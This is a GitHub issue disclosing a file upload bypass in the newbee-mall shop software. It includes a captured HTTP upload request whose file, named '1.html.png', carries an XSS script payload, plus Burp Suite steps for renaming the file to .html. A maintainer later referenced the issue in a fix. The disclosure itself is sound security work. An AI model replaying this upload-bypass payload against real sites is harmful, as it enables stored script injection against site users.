Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

There is a File upload vulnerability exists in newbee-mall #63

Closed
afeng2016-s opened this issue Mar 3, 2022 · 0 comments
Closed

There is a File upload vulnerability exists in newbee-mall #63

afeng2016-s opened this issue Mar 3, 2022 · 0 comments

Comments

@afeng2016-s
Copy link

afeng2016-s commented Mar 3, 2022

[Suggested description]
A file upload vulnerability exists in NewBee mall. Because the upload method of uploadcontroller can bypass the upload restriction by modifying the file format suffix.

[Vulnerability Type]
File upload vulnerability

[Vendor of Product]
https://github.com/newbee-ltd/newbee-mall

[Affected Product Code Base]
v1.0.0

[Affected Component]
POST /admin/upload/file HTTP/1.1
Host: localhost:28089
Content-Length: 671
Cache-Control: max-age=0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: http://localhost:28089/
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoXATzrr6JWhnTx5Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: iframe
Referer: http://localhost:28089/admin/goods/edit/10907
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: locale=zh-cn; Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1645520663,1645696647; JSESSIONID=11D044F12F07C3F2772AC7EE836610E2
Connection: close

------WebKitFormBoundaryoXATzrr6JWhnTx5Q
Content-Disposition: form-data; name="file"; filename="1.html.png"
Content-Type: image/png

<script type="text/javascript" src="http://www.qq.com/404/search_children.js" charset="utf-8" homePageUrl="{{domain}}" homePageName="{{siteName}}"></script>
        <script>alert("xss")</script>
    </div>
</div>
------WebKitFormBoundaryoXATzrr6JWhnTx5Q--

[Impact Code execution]
true

[Vulnerability proof]
1.Access address http://localhost:28089/admin/goods , select a commodity information to modify and enter the file upload page.
image
2.Open burpsuite packet capturing agent and click to upload pictures.
image
3.By default, the system only supports JPG, PNG and GIF files. We can bypass them by modifying the file suffix.
image
4.Modify the value of filename to 1.html
image
Get the access path to file upload
image
Complete data update
image
5.Access the upload file path, and the vulnerability reproduction is completed.
image

[Defective code]
image

ZHENFENG13 added a commit that referenced this issue Nov 3, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants